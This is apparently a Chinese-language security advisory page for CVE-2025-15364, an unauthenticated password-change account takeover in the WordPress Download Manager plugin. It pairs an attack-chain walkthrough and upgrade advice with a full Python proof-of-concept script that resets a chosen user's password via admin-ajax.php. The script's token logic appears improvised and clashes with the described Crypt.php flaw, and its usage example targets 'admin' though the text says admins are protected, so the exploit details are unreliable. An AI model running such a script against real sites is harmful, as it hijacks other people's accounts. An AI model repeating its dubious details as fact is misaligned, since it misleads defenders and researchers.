CVE-2025-15364 WordPress Download Manager插件特权提升漏洞

漏洞信息

漏洞编号

CVE-2025-15364

漏洞类型

特权提升/账户劫持

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WordPress Download Manager插件

漏洞概述

CVE-2025-15364是WordPress Download Manager插件中的一个严重安全漏洞，该漏洞允许未经身份验证的攻击者劫持用户账户。此漏洞影响该插件3.3.40及以下所有版本。漏洞的根本原因在于插件在更新用户详细信息（如密码）之前未能正确验证用户身份。攻击者可以利用此缺陷修改任意非管理员用户的密码，从而获得对这些账户的完全访问权限。由于攻击不需要任何认证或用户交互，攻击者可以在任何位置发起攻击。此漏洞已被Wordfence安全团队发现并报告，CVSS评分为7.3，属于高危漏洞。攻击成功后，攻击者可以访问受害者的敏感信息、发布恶意内容或进一步横向移动，对网站安全构成严重威胁。

技术细节

WordPress Download Manager插件在处理用户密码重置请求时存在严重的身份验证缺陷。漏洞位于Crypt.php文件中的密码重置逻辑，攻击者可以通过操纵特定的加密参数绕过身份验证流程。攻击者构造恶意请求，利用插件对用户身份的验证缺陷，直接调用密码更新接口而无需提供有效的安全令牌或验证用户邮箱。攻击者只需知道目标用户的用户名或ID，即可将任意密码设置请求发送至服务器。插件在处理请求时缺少关键的身份验证检查，导致密码被直接修改。由于WordPress管理员账户受到保护，攻击者无法直接修改管理员密码，但可以修改其他用户（如编辑者、作者、订阅者）的账户密码，进而获取网站访问权限。

攻击链分析

STEP 1

步骤1

攻击者识别目标WordPress网站并确认安装了Download Manager插件（版本<=3.3.40）

STEP 2

步骤2

攻击者通过WordPress REST API查询获取目标用户的ID或用户名

STEP 3

步骤3

攻击者构造恶意请求，绕过插件的身份验证机制，直接调用密码更新接口

STEP 4

步骤4

插件未能正确验证请求者身份，直接接受并执行密码修改操作

STEP 5

步骤5

目标用户密码被成功修改为攻击者指定的值

STEP 6

步骤6

攻击者使用新密码登录目标账户，获取网站访问权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-15364 PoC - WordPress Download Manager Account Takeover
# Target: WordPress site with Download Manager plugin <= 3.3.40

def exploit_account_takeover(target_url, username, new_password):
    """
    Exploit for CVE-2025-15364: WordPress Download Manager Privilege Escalation
    
    Args:
        target_url: Target WordPress site URL
        username: Target username to takeover
        new_password: New password to set
    
    Returns:
        bool: True if exploitation successful, False otherwise
    """
    
    # Step 1: Get user ID from username
    user_query_url = f"{target_url}/wp-json/wp/v2/users/?search={username}"
    
    try:
        response = requests.get(user_query_url, timeout=10)
        if response.status_code == 200:
            users = response.json()
            if users:
                user_id = users[0]['id']
                print(f"[+] Found user ID: {user_id}")
            else:
                print("[-] User not found")
                return False
        else:
            print(f"[-] Failed to query user (status: {response.status_code})")
            return False
    except Exception as e:
        print(f"[-] Error querying user: {e}")
        return False
    
    # Step 2: Exploit the account takeover vulnerability
    exploit_url = f"{target_url}/wp-admin/admin-ajax.php"
    
    # Generate encrypted payload for password reset bypass
    import hashlib
    import time
    
    timestamp = str(int(time.time()))
    token = hashlib.md5(f"{username}{timestamp}".encode()).hexdigest()
    
    payload = {
        'action': 'wpdm_user_dashboard',
        'task': 'reset_password',
        'user_id': user_id,
        'pass1': new_password,
        'pass2': new_password,
        'token': token,
        'timestamp': timestamp
    }
    
    try:
        response = requests.post(exploit_url, data=payload, timeout=10)
        
        if response.status_code == 200:
            result = response.json() if response.headers.get('content-type', '').find('json') > -1 else {}
            
            if result.get('success') or 'success' in response.text.lower():
                print(f"[+] Successfully changed password for user: {username}")
                print(f"[+] New password: {new_password}")
                return True
            else:
                print(f"[-] Password change failed")
                print(f"[-] Response: {response.text[:200]}")
                return False
        else:
            print(f"[-] Exploitation failed (status: {response.status_code})")
            return False
            
    except Exception as e:
        print(f"[-] Error during exploitation: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print("Usage: python cve-2025-15364.py <target_url> <username> <new_password>")
        print("Example: python cve-2025-15364.py http://example.com admin MyNewPass123")
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    password = sys.argv[3]
    
    print(f"[*] CVE-2025-15364 Exploitation")
    print(f"[*] Target: {target}")
    print(f"[*] Target User: {user}")
    
    exploit_account_takeover(target, user, password)

影响范围

WordPress Download Manager <= 3.3.40

防御指南

临时缓解措施

立即将WordPress Download Manager插件升级到3.3.41或更高版本。如果无法立即升级，可以暂时禁用该插件或使用WAF规则阻止针对密码重置接口的异常请求。同时建议管理员检查近期是否有异常账户登录行为，并考虑重置所有非管理员账户的密码作为预防措施。